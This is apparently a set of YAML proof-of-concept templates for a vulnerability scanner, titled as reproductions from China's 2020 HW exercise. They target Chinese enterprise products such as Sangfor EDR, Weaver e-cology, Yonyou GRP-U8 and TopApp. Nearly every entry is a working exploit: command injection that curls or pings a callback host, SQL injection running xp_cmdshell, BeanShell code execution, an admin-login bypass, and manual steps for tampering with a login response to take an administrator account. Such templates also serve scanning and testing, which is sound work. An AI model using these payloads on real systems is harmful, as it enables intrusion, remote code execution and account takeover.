link: Vulnerability reproductions from the 2020 HW (护网) exercise
name: poc-yaml-qzblj-java-CNVD-2019-20835
set:
  reverse: newReverse()
  reverseURL: reverse.url
rules:
  - method: POST
    path: /shterm/listener/tui_update.php
    body: |
      ["t';import os;os.popen('curl+{{reverseURL}}')#"]
    expression: |
      reverse.wait(5)
detail:
  author: HWHXY
  links:
    - https://my.oschina.net/u/4322686/blog/3448771

name: poc-yaml-trx-TopApp-sqli
set:
  r1: randomInt(40000, 44800)
  r2: randomInt(40000, 44800)
rules:
  - method: POST
    path: >-
      /acc/clsf/report/datasource.php
    body: >-
      t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,md5(666),11,12,13,14,15,16,17,18,19,20,21,22--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=
    expression: |
      response.status == 200 && response.body.bcontains(b"fae0b27c451c728867a567e8c1bb4e53")
detail:
  author: MaxSecurity(https://github.com/MaxSecurity)
  links:
    - https://www.weaver.com.cn/

name: poc-yaml-trx-TopAPP-rce
set:
  reverse: newReverse()
  reverseURL: reverse.url
rules:
  - method: POST
    path: /login_check.php
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: >-
      userName=; ping {{reverseURL}}; echo&password=1&x=29&x=16
    follow_redirects: true
    expression: |
      response.status == 200 && reverse.wait(5)
detail:
  author: HWHXY
  links:
    - https://blog.csdn.net/Adminxe/article/details/108744908

name: poc-yaml-yonyou-grp-u8-sqli-to-rce
set:
  r1: randomInt(1000, 9999)
  r2: randomInt(1000, 9999)
rules:
  - method: POST
    path: /Proxy
    follow_redirects: false
    body: |
      cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'set/A {{r1}}*{{r2}}'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
    expression: |
      response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
  author: MrP01ntSun(https://github.com/MrPointSun)
  links:
    - https://www.hackbug.net/archives/111.html

Enter any password -> change the response packet to True -> forward it -> wait for the second intercepted packet -> it contains the administrator's MD5 -> substitute that MD5 to log in; alternatively, request the endpoint directly: /webapi/v1/system/accountmanage/account
POST /?module=auth_user&action=mod_edit_pwd
Host: xxxxxxxxxxxxx
Cookie: username=superman;

uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1

name: poc-yaml-sangfor-edr-arbitrary-admin-login
rules:
  - method: GET
    path: /ui/login.php?user=admin
    follow_redirects: false
    expression: >
      response.status == 302 &&
      response.body.bcontains(b"/download/edr_installer_") &&
      response.headers["Set-Cookie"] != ""
detail:
  author: hilson
  links:
    - https://mp.weixin.qq.com/s/6aUrXcnab_EScoc0-6OKfA

name: poc-yaml-sangfor-edr-tool-rce
set:
  r1: randomLowercase(8)
  r2: randomLowercase(8)
rules:
  - method: GET
    path: "/tool/log/c.php?strip_slashes=printf&host={{r1}}%25%25{{r2}}"
    follow_redirects: false
    expression: |
      response.status == 200 && response.body.bcontains(bytes(r1 + "%" + r2))
detail:
  author: cookie
  links:
    - https://edr.sangfor.com.cn/

name: poc-yaml-sangfor-edr-rce
set:
  reverse: newReverse()
  reverseURL: reverse.url
rules:
  - method: POST
    path: "/api/edr/sanforinter/v2/cssp/slog_client?token=e21kNTp0cnVlfQ=="
    follow_redirects: false
    body: |
      {"params":"w=123\"'1234123'\"|ping {{reverse.url}}"}
    expression: |
      response.status == 200 && reverse.wait(5)
detail:
  author: HWHXY
  links:
    - https://edr.sangfor.com.cn/

name: poc-yaml-ecology-javabeanshell-rce
set:
  r1: randomInt(40000, 44800)
  r2: randomInt(40000, 44800)
rules:
  - method: POST
    path: /weaver/bsh.servlet.BshServlet
    body: >-
      bsh.script=print%28{{r1}}*{{r2}}%29&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
    follow_redirects: false
    expression: |
      response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
  author: l1nk3r
  links:
    - https://www.weaver.com.cn/cs/securityDownload.asp

name: poc-yaml-ecology-workflowcentertreedata-sqli set: r1: randomInt(4000, 9999) r2: randomInt(800, 1000) rules: - method: POST path: /mobile/browser/WorkflowCenterTreeData.jsp headers: Content-Type: application/x-www-form-urlencoded body: >- node=wftype_1132232323231&scope=23332323&formids=1111111111111%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0
a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a)))union+select+1024,({{r1}}*{{r2}})+order+by+(((1 follow_redirects: true expression: | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) detail: author: JingLing(https://hackfun.org/) links: - https://anonfiles.com/A4cede8an1/_OA_WorkflowCenterTreeData_oracle_html - https://mp.weixin.qq.com/s/9mpvppx3F-nTQYoPdY2r3w